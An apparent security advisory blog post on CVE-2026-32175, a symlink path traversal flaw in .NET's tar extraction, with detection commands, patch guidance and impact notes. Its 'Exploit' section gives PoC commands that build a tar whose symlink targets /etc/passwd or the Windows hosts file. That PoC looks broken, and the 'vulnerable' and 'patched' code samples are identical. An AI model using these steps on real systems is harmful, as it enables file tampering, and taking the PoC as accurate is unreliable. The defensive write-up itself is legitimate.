Listen to this Post
How CVE-2026-32175 Works
A tampering vulnerability exists in the .NET `System.Formats.Tar` library when extracting tar archives using the `TarFile.ExtractToDirectory` and `ExtractRelativeToDirectoryAsync` methods. The flaw is a symbolic link (symlink) path traversal vulnerability that enables an attacker to perform arbitrary file writes outside the intended extraction directory.
The vulnerability resides in the path handling logic within src/libraries/System.Formats.Tar/src/System/Formats/Tar/TarEntry.cs. An attacker can craft a malicious tar archive containing a symlink entry whose target is a rooted path (e.g., an absolute path on Windows). When the vulnerable `TarFile.ExtractToDirectory` method extracts this archive, it does not properly validate the symlink target, allowing the symlink to be created outside the destination directory.
Once the attacker-controlled symlink is placed on the filesystem, it can be used to redirect subsequent file writes. A later entry in the tar archive can write through this symlink, effectively writing arbitrary files to any location on the same drive that the extracting process has permissions to access. This two-step process—first creating a malicious symlink, then writing through it—bypasses the intended directory boundary.
The attack does not require special privileges beyond the ability to provide a crafted tar file to an application that uses the vulnerable API. However, the impact is limited by the permissions of the process performing the extraction. According to the maintainers, an attacker would have limited control over the destination of the files and directories. The vulnerability affects all platforms and architectures where the affected .NET versions are used.
The fix addresses the issue by ensuring that .NET Core properly handles files and validates symlink targets during extraction, preventing the creation of symlinks that point outside the intended extraction directory. Microsoft has released security updates for .NET 8.0, 9.0, and 10.0 to remediate this vulnerability.
DailyCVE Form:
Platform: ……. .NET Core / .NET
Version: …….. 8.0 (<8.0.27), 9.0 (<9.0.16), 10.0 (<10.0.8)
Vulnerability :…… Path Traversal (Symlink)
Severity: ……. Medium (CVSS 4.3)
date: ………. May 18, 2026
Prediction: …… June 9, 2026
What Undercode Say: Analytics
The vulnerability allows writing arbitrary files outside the extraction directory by first creating a symlink to a rooted path.
Detection Commands:
Check your .NET version to determine if you are affected:
dotnet --info
Check project dependencies for vulnerable package versions:
dotnet list package --vulnerable
Vulnerable Code Pattern:
using System.Formats.Tar;
// Vulnerable: Extracts tar without symlink validation
TarFile.ExtractToDirectory("malicious.tar", "./extract");
Patched Code Pattern:
using System.Formats.Tar;
// Safe: After updating to patched version
TarFile.ExtractToDirectory("malicious.tar", "./extract");
Exploit
An attacker can create a malicious tar archive with the following structure:
1. A symlink entry pointing to a rooted path outside the extraction directory (e.g., `C:\Windows\System32\config\` on Windows).
2. A regular file entry that writes through the symlink to an arbitrary location.
PoC Tar Creation (Linux/macOS):
Create a symlink pointing outside the extraction directory ln -s /etc/passwd malicious_symlink Create a tar archive containing the symlink tar -cf exploit.tar malicious_symlink Add a file that will be written through the symlink echo "malicious content" > payload.txt tar -rf exploit.tar payload.txt
PoC Tar Creation (Windows – using PowerShell):
Create a symlink (requires elevated privileges or developer mode) New-Item -ItemType SymbolicLink -Path "malicious_symlink" -Target "C:\Windows\System32\drivers\etc\hosts" Create tar archive (using 7zip or similar) Then add a file that writes through the symlink
When a vulnerable application extracts this archive, the symlink is created outside the intended directory, and the subsequent file write operation can overwrite critical system files.
Protection
- Update .NET Runtime/SDK: Install the latest version of .NET 8.0 (8.0.27+), .NET 9.0 (9.0.16+), or .NET 10.0 (10.0.8+).
- Update NuGet Packages: If your application references `System.Formats.Tar` directly, update the package reference to the patched version.
- Restart Applications: After installing the updated runtime or SDK, restart your apps for the update to take effect.
- Recompile Self-Contained Applications: If you have deployed self-contained applications targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed.
- Input Validation: If immediate updating is not possible, validate all extracted paths to ensure they remain within the intended directory.
- Least Privilege: Run extraction processes with the least privileges necessary to limit the impact of a potential exploit.
Impact
- Arbitrary File Write: An attacker can write files to any location on the system that the extracting process has permissions to access.
- System Compromise: If the extraction process runs with elevated privileges (e.g., as Administrator or root), an attacker could overwrite critical system files, leading to system compromise or privilege escalation.
- Data Tampering: The vulnerability can be used to tamper with application configuration files, leading to further attacks.
- Limited Control: According to Microsoft, an attacker would have limited control over the destination of the files and directories, reducing the overall severity.
- Supply Chain Risk: Applications that process untrusted tar archives (e.g., automated build systems, deployment pipelines, web applications) are particularly at risk.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
